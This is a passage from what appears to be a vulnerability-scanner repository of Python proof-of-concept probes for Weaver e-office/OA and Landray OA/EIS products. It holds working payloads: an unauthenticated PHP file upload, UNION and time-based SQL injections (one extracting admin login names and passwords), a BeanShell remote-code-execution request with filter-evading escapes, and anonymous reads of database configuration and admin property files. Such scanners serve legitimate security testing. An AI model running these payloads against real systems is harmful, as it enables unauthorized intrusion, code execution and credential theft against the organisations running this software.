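        # Content-Length either: requests computes the real one.
        'Content-Type': 'multipart/form-data; boundary=' + boundary,
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
    }
    # CRLF-delimited multipart body (RFC 2046).  The FileData part is empty.
    data = '\r\n'.join([
        '--' + boundary,
        'Content-Disposition: form-data; name="FileData"; filename="1.jpg"',
        'Content-Type: image/jpeg',
        '',
        '',
        '--' + boundary,
        'Content-Disposition: form-data; name="FormData"',
        '',
        "{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test112.php'}",
        '--' + boundary + '--',
        '',
    ])
    vurl = urllib.parse.urljoin(url, "/eoffice10/server/public/iWebOffice2015/OfficeServer.php")
    try:
        response = requests.post(vurl, headers=headers, data=data, timeout=5)
        if response.status_code == 200:
            # urljoin (not f-string concatenation) so a trailing slash on
            # ``url`` does not produce a double slash.
            vurl = urllib.parse.urljoin(url, "/eoffice10/server/public/iWebOffice2015/Document/test112.php")
            response = requests.get(vurl, timeout=5)
            if response.status_code == 200 and 'PHP' in response.text:
                relsult['vulnerable'] = True
                relsult['verify'] = vurl
        return relsult
    except Exception:
        # Best-effort probe; ``Exception`` (not bare) keeps Ctrl-C working.
        return relsult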
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_UserSelect_unauth.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
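def verify(url):
    """Check whether Weaver e-office exposes ``/UserSelect/`` without authentication.

    The page is fetched anonymously; a 200 reply whose body contains the
    department-picker text ``所有部门`` is taken as the unauthenticated user
    directory being reachable.

    Args:
        url: Base URL of the target.

    Returns:
        A dict with ``name``, ``vulnerable`` and ``url``; when vulnerable also
        ``verify`` (the URL that answered).  Network failures are reported as
        not vulnerable instead of being raised.
    """
    relsult = {
        'name': '泛微e-office系统UserSelect接口存在未授权访问漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Accept-Encoding': 'gzip, deflate',
        'Connection':'close'
    }
    vurl = urllib.parse.urljoin(url, "/UserSelect/")
    try:
        response = requests.get(vurl, headers=headers, timeout=5)
        if response.status_code == 200 and '所有部门' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult
    except Exception:
        # Best-effort probe; ``Exception`` (not a bare except) so Ctrl-C and
        # SystemExit still propagate to the scanner.
        return relsult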
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_config_2_unauth.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
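def verify(url):
    """Check whether Weaver e-office serves ``mobileurl/config_2.php`` without authentication.

    The page is fetched anonymously; a 200 reply containing both the
    ``数据库名`` (database name) and ``用户名`` (user name) labels is taken as
    the database-configuration page being exposed.

    Args:
        url: Base URL of the target.

    Returns:
        A dict with ``name``, ``vulnerable`` and ``url``; when vulnerable also
        ``verify`` (the URL that answered).  Network failures are reported as
        not vulnerable instead of being raised.
    """
    relsult = {
        'name': '泛微e-office config_2.php未授权访问',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Accept-Encoding': 'gzip, deflate',
        'Connection':'close'
    }
    vurl = urllib.parse.urljoin(url, "/building/backmgr/urlpage/mobileurl/config_2.php")
    try:
        response = requests.get(vurl, headers=headers, timeout=5)
        body = response.text
        if response.status_code == 200 and '数据库名' in body and '用户名' in body:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult
    except Exception:
        # Best-effort probe; ``Exception`` (not a bare except) so Ctrl-C and
        # SystemExit still propagate to the scanner.
        return relsult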
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_json_common_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
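def verify(url):
    """Probe Weaver E-Office ``building/json_common.php`` for SQL injection.

    A pre-encoded form body injects a UNION query that evaluates
    ``md5(102103122)``; the response is then searched for ``6cfe798ba8``,
    expected to be the leading hex digits of that hash.

    Args:
        url: Base URL of the target.

    Returns:
        A dict with ``name``, ``vulnerable`` and ``url``; when vulnerable also
        ``verify`` (the URL posted to).  Network failures are reported as not
        vulnerable instead of being raised.
    """
    relsult = {
        'name': '泛微E-Office-json_common.phpSQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',
        'Connection': 'close',
        'Accept': '*/*',
        'Accept-Language': 'en',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept-Encoding': 'gzip'
    }
    # Sent verbatim as the form body (no further encoding by requests).
    data = '''tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333'''
    vurl = urllib.parse.urljoin(url, "/building/json_common.php")
    try:
        # A timeout so one hung target cannot stall the whole scan.
        response = requests.post(vurl, headers=headers, data=data, timeout=5)
        if response.status_code == 200 and '6cfe798ba8' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult
    except Exception:
        # Best-effort probe; ``Exception`` (not bare) keeps Ctrl-C working.
        return relsult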
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_jx2_config_unauth.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
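def verify(url):
    """Check whether Weaver E-Office serves ``configfile/jx2_config.ini`` anonymously.

    The INI file is fetched directly.  A 200 reply containing ``user`` is
    taken as the configuration being exposed; an HTML body is rejected so a
    catch-all "200 + HTML" page that merely mentions "user" (a login form,
    a soft 404) does not count as a hit.

    Args:
        url: Base URL of the target.

    Returns:
        A dict with ``name``, ``vulnerable`` and ``url``; when vulnerable also
        ``verify`` (the URL that answered).  Network failures are reported as
        not vulnerable instead of being raised.
    """
    relsult = {
        'name': '泛微E-Office-jx2_config存在信息泄露漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
        # Throwaway session id; the file is expected to be served without one.
        'Cookie': 'LOGIN_LANG=cn; PHPSESSID=265e1c6495a3bd40146196a1a42cd8dd',
        'Upgrade-Insecure-Requests': '1'
    }
    vurl = urllib.parse.urljoin(url, "/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini")
    try:
        response = requests.get(vurl, headers=headers, timeout=3)
        body = response.text
        # An INI file never contains an HTML document tag; this guards
        # against the weak ``'user'`` substring matching an HTML page.
        if response.status_code == 200 and 'user' in body and '<html' not in body.lower():
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult
    except Exception:
        # Best-effort probe; ``Exception`` (not bare) keeps Ctrl-C working.
        return relsult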
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_leave_record_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
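def verify(url):
    """Probe Weaver E-Office 10 ``leave_record.php`` for time-based blind SQL injection.

    ``flow_id`` carries an injected ``SLEEP(5)``; the target is reported
    vulnerable when the request is not rejected with a 4xx and the reply
    takes longer than five seconds.  NOTE: a single timing sample is used,
    so a slow or overloaded target can produce a false positive -- re-run or
    compare against a benign request before acting on a hit.

    Args:
        url: Base URL of the target.

    Returns:
        A dict with ``name``, ``vulnerable`` and ``url``; when vulnerable also
        ``verify`` (the injected URL).  Network failures, including a read
        timeout, are reported as not vulnerable instead of being raised.
    """
    relsult = {
        'name': '泛微E-office-10接口leave_record.php存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Accept-Encoding': 'gzip, deflate',
        'Connection':'close'
    }
    vurl = urllib.parse.urljoin(url, "/eoffice10/server/ext/system_support/leave_record.php?flow_id=1%27+AND+%28SELECT+4196+FROM+%28SELECT%28SLEEP%285%29%29%29LWzs%29+AND+%27zfNf%27%3D%27zfNf&run_id=1&table_field=1&table_field_name=user()&max_rows=10")
    try:
        # The timeout must stay well above the 5 s sleep so a real hit still
        # completes, while a hung target no longer blocks the scan forever.
        response = requests.get(vurl, headers=headers, timeout=15)
        not_rejected = not (400 <= response.status_code < 500)
        if not_rejected and response.elapsed.total_seconds() > 5:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult
    except Exception:
        # Best-effort probe; ``Exception`` (not bare) keeps Ctrl-C working.
        return relsult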
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_login_other_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
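def verify(url):
    """Probe Weaver E-Office ``E-mobile/Data/login_other.php`` for SQL injection.

    The ``auth`` JSON parameter carries a UNION query that evaluates
    ``md5(123456)``; the response is searched for ``e10adc3949``, the leading
    digits of that hash.

    Args:
        url: Base URL of the target.

    Returns:
        A dict with ``name``, ``vulnerable`` and ``url``; when vulnerable also
        ``verify`` (the injected URL).  Network failures are reported as not
        vulnerable instead of being raised.
    """
    relsult = {
        'name': '泛微E-Office系统login_other.php存在sql注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Accept-Encoding': 'gzip, deflate',
        'Connection':'close'
    }
    # Raw quotes/braces/spaces are left for requests to percent-encode.
    vurl = urllib.parse.urljoin(url, '''/E-mobile/Data/login_other.php?diff=sync&auth={"auths":[{"value":"-1' UNION SELECT 1,2,md5(123456),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23"}]}''')
    try:
        response = requests.get(vurl, headers=headers, timeout=5)
        if response.status_code == 200 and 'e10adc3949' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult
    except Exception:
        # Best-effort probe; ``Exception`` (not a bare except) so Ctrl-C and
        # SystemExit still propagate to the scanner.
        return relsult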
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_schema_mysql_unauth.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
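def verify(url):
    """Check whether Weaver E-Office 10 serves ``empty_scene/db/schema_mysql.sql`` anonymously.

    The SQL schema dump is fetched directly; a 200 reply containing
    ``CREATE`` is taken as the file being exposed.

    Args:
        url: Base URL of the target.

    Returns:
        A dict with ``name``, ``vulnerable`` and ``url``; when vulnerable also
        ``verify`` (the URL that answered).  Network failures are reported as
        not vulnerable instead of being raised.
    """
    relsult = {
        'name': '泛微e-office10系统schema_mysql.sql敏感信息泄露漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/120.0.0.0Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip,deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    vurl = urllib.parse.urljoin(url, "/eoffice10/empty_scene/db/schema_mysql.sql")
    try:
        response = requests.get(vurl, headers=headers, timeout=5)
        exposed = response.status_code == 200 and 'CREATE' in response.text
        if exposed:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult
    except Exception:
        # Best-effort probe; ``Exception`` (not a bare except) so Ctrl-C and
        # SystemExit still propagate to the scanner.
        return relsult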
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/fanwei_Bsh_rce.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # 泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204
3 | # Fofa: app="泛微-协同办公OA"
4 | import requests
5 | import sys,re
6 | import urllib
7 |
8 |
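def verify(target):
    """Probe Weaver OA's BeanShell servlet (CNVD-2019-32204) for remote code execution.

    A BeanShell script that runs ``whoami`` is posted to
    ``weaver/bsh.servlet.BshServlet`` with raw output requested.  The target
    is reported vulnerable when the reply looks like script output rather
    than the servlet's script echo, a login redirect or an error page.
    NOTE: this executes a (harmless) command on the target.

    Args:
        target: Base URL of the target.  The servlet path is joined
            relatively, as in the original, so a path component on
            ``target`` is kept.

    Returns:
        A dict with ``name`` and ``vulnerable``; when vulnerable also ``url``,
        ``method`` and ``payload`` describing the request that succeeded.
        Network failures are reported as not vulnerable instead of raised.
    """
    relsult = {
        'name': '泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204',
        'vulnerable': False
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    target = urllib.parse.urljoin(target, "weaver/bsh.servlet.BshServlet")
    # ``exec`` is spelled with \u escapes that BeanShell decodes itself
    # (presumably to get past a plain-text keyword filter in front of it).
    payload = """bsh.script=\\u0065\\u0078\\u0065\\u0063("whoami");&bsh.servlet.output=raw"""
    try:
        requests.packages.urllib3.disable_warnings()
        request = requests.post(headers=headers, url=target, data=payload, timeout=5, verify=False)
        body = request.text
        # Success signature: mentions BeanShell, but does not echo the script
        # (";"), bounce to the login page, show an error, or span several
        # lines.  The last test is restored from a literal that was wrapped
        # across two lines in the original source (a newline character).
        looks_like_output = (
            ";" not in body
            and "BeanShell" in body
            and "Login.jsp" not in body
            and "Error" not in body
            and "\n" not in body
        )
        if looks_like_output:
            relsult['vulnerable'] = True
            relsult['url'] = target
            relsult['method'] = 'POST'
            relsult['payload'] = payload
        return relsult
    except Exception:
        # Best-effort probe; ``Exception`` (not a bare except) so Ctrl-C and
        # SystemExit still propagate to the scanner.
        return relsult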
35 |
36 |
37 |
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray-eis-doc_fileedit_word-sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray-eis-doc_fileedit_word-sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray-eis-frm_button_func-sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray-eis-frm_button_func-sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray-eis-rpt_listreport_definefield-sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray-eis-rpt_listreport_definefield-sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray_oa-dataxml_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray_oa-dataxml_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray_oa_WechatLoginHelper_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray_oa_WechatLoginHelper_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray_oa_admindo_jndiinject_2021.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray_oa_admindo_jndiinject_2021.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray_oa_custom_jsp_fileread.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray_oa_custom_jsp_fileread.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray_oa_treexml_rce_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray_oa_treexml_rce_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray_sysUiComponent_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray_sysUiComponent_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landray_treexml_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landray_treexml_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landry-eis-ShowUserInfo-sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landry-eis-ShowUserInfo-sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landry-eis-UniformEntry-sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landry-eis-UniformEntry-sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landry-eis-fl_define_flow_chart_show-sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landry-eis-fl_define_flow_chart_show-sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landry-eis-frm_form_list_main-sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landry-eis-frm_form_list_main-sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landry-eis-saveImg-fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landry-eis-saveImg-fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/__pycache__/landry_oa_sysUiExtend_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/landray/__pycache__/landry_oa_sysUiExtend_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray-eis-doc_fileedit_word-sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
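def verify(url):
    """Probe Landray EIS ``dossier/doc_fileedit_word.aspx`` for error-based SQL injection.

    ``recordid`` carries ``1' and 1=@@version--``; the probe expects the
    resulting type-conversion error to surface as an HTTP 500 whose body
    mentions ``Microsoft``.

    Args:
        url: Base URL of the target.

    Returns:
        A dict with ``name``, ``vulnerable`` and ``url``; when vulnerable also
        ``verify`` (the injected URL).  Network failures are reported as not
        vulnerable instead of being raised.
    """
    relsult = {
        'name': '蓝凌EIS智慧协同平台doc_fileedit_word.aspx接口SQL注入',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1")
    try:
        # A timeout so one hung target cannot stall the whole scan.
        response = requests.get(vurl, headers=headers, timeout=5)
        if response.status_code == 500 and 'Microsoft' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult
    except Exception:
        # Best-effort probe; ``Exception`` (not bare) keeps Ctrl-C working.
        return relsult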
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray-eis-frm_button_func-sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
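def verify(url):
    """Probe Landray EIS ``frm/frm_button_func.aspx`` for error-based SQL injection.

    ``formid`` carries ``1 and 1=@@version--``; the probe expects the
    resulting type-conversion error to surface as an HTTP 500 whose body
    mentions ``Microsoft``.

    Args:
        url: Base URL of the target.

    Returns:
        A dict with ``name``, ``vulnerable`` and ``url``; when vulnerable also
        ``verify`` (the injected URL).  Network failures are reported as not
        vulnerable instead of being raised.
    """
    relsult = {
        'name': '蓝凌EIS智慧协同平台frm_button_func.aspx接口SQL注入',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/frm/frm_button_func.aspx?formid=1%20and%201=@@version--+")
    try:
        # A timeout so one hung target cannot stall the whole scan.
        response = requests.get(vurl, headers=headers, timeout=5)
        errored = response.status_code == 500 and 'Microsoft' in response.text
        if errored:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult
    except Exception:
        # Best-effort probe; ``Exception`` (not bare) keeps Ctrl-C working.
        return relsult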
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray-eis-rpt_listreport_definefield-sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
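def verify(url):
    """Probe Landray EIS ``SM/rpt_listreport_definefield.aspx`` for error-based SQL injection.

    ``ID`` carries ``2 and 1=@@version--``; the probe expects the resulting
    type-conversion error to surface as an HTTP 500 whose body mentions
    ``Microsoft``.

    Args:
        url: Base URL of the target.

    Returns:
        A dict with ``name``, ``vulnerable`` and ``url``; when vulnerable also
        ``verify`` (the injected URL).  Network failures are reported as not
        vulnerable instead of being raised.
    """
    relsult = {
        'name': '蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Connection': 'Keep-Alive',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Upgrade-Insecure-Requests': '1'
    }
    vurl = urllib.parse.urljoin(url, "/SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+")
    try:
        # A timeout so one hung target cannot stall the whole scan.
        response = requests.get(vurl, headers=headers, timeout=5)
        if response.status_code == 500 and 'Microsoft' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult
    except Exception:
        # Best-effort probe; ``Exception`` (not bare) keeps Ctrl-C working.
        return relsult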
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray_oa_WechatLoginHelper_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
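def verify(url):
    """Probe Landray OA ``third/wechat/wechatLoginHelper.do`` for SQL injection.

    The ``uid`` form field carries an ``updatexml``-based error injection that
    selects an admin login name and password; the target is reported
    vulnerable on a 200 reply whose body contains ``nvarchar``.

    NOTE(review): the success marker ``nvarchar`` is a SQL Server type name
    while ``updatexml`` is MySQL syntax -- confirm the expected error
    signature against a known-vulnerable instance before relying on a miss.

    Args:
        url: Base URL of the target.

    Returns:
        A dict with ``name``, ``vulnerable`` and ``url``; when vulnerable also
        ``verify`` (the URL posted to).  Network failures are reported as not
        vulnerable instead of being raised.
    """
    relsult = {
        'name': '蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.850.132 Safari/537.36',
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept-Encoding': 'gzip'
    }
    # Sent verbatim as the form body; the %25 sequences decode to '%' on the
    # server so the LIKE pattern becomes %admin12%.
    data = "method=edit&openid=&nickname=&image=&uid=123'and updatexml(1,concat('~',(select concat('~',test.fdLoginName,'~',test.fdPassword,'~') from com.landray.kmss.sys.organization.model.SysOrgPerson test where test.fdLoginName like '%25admin12%25'),'~'),1)=1-- '"
    vurl = urllib.parse.urljoin(url, "/third/wechat/wechatLoginHelper.do")
    try:
        # The original built ``data`` but never sent it (no ``data=``), so the
        # endpoint was hit with an empty body and could never trigger.
        response = requests.post(vurl, headers=headers, data=data, timeout=5)
        if response.status_code == 200 and 'nvarchar' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult
    except Exception:
        # Best-effort probe; ``Exception`` (not bare) keeps Ctrl-C working.
        return relsult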
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray_oa_admindo_jndiinject_2021.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re
3 | import urllib
4 |
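def verify(url, timeout=3):
    """Probe a Landray OA host through ``/sys/ui/extend/varkind/custom.jsp``.

    Despite the ``name`` (JNDI remote command execution), the request itself
    only POSTs a ``var`` document asking ``custom.jsp`` for
    ``/WEB-INF/KmssConfig/admin.properties``. The target is flagged when the
    HTTP 200 reply contains both ``password`` and
    ``kmss.properties.encrypt.enabled``.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (was a hard-coded local).

    Returns:
        dict with ``name`` and ``vulnerable`` only (no ``url`` key, unlike
        most sibling PoCs).
    """
    result = {
        'name': '蓝凌OA admin.do JNDI远程命令执行',
        'vulnerable': False,
    }
    payload_data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)',
        'Content-type': 'application/x-www-form-urlencoded',
    }
    vurl = urllib.parse.urljoin(url, "/sys/ui/extend/varkind/custom.jsp")
    try:
        # verify=False (kept from the original) disables TLS certificate
        # checking so self-signed targets can be scanned; the trade-off is
        # that an interposed host cannot be told apart from the real one.
        rep = requests.post(vurl, headers=headers, timeout=timeout, data=payload_data, verify=False)
        # Raw string: ``\.`` in a plain literal is an invalid escape and a
        # SyntaxWarning on Python 3.12+, with the same regex either way.
        if (rep.status_code == 200
                and re.search('password', rep.text)
                and re.search(r"kmss\.properties\.encrypt\.enabled", rep.text)):
            result['vulnerable'] = True
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result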
24 |
--------------------------------------------------------------------------------
/pocs/web/OA/landray/landray_oa_custom_jsp_fileread.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib, re
3 |
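def verify(url, timeout=3):
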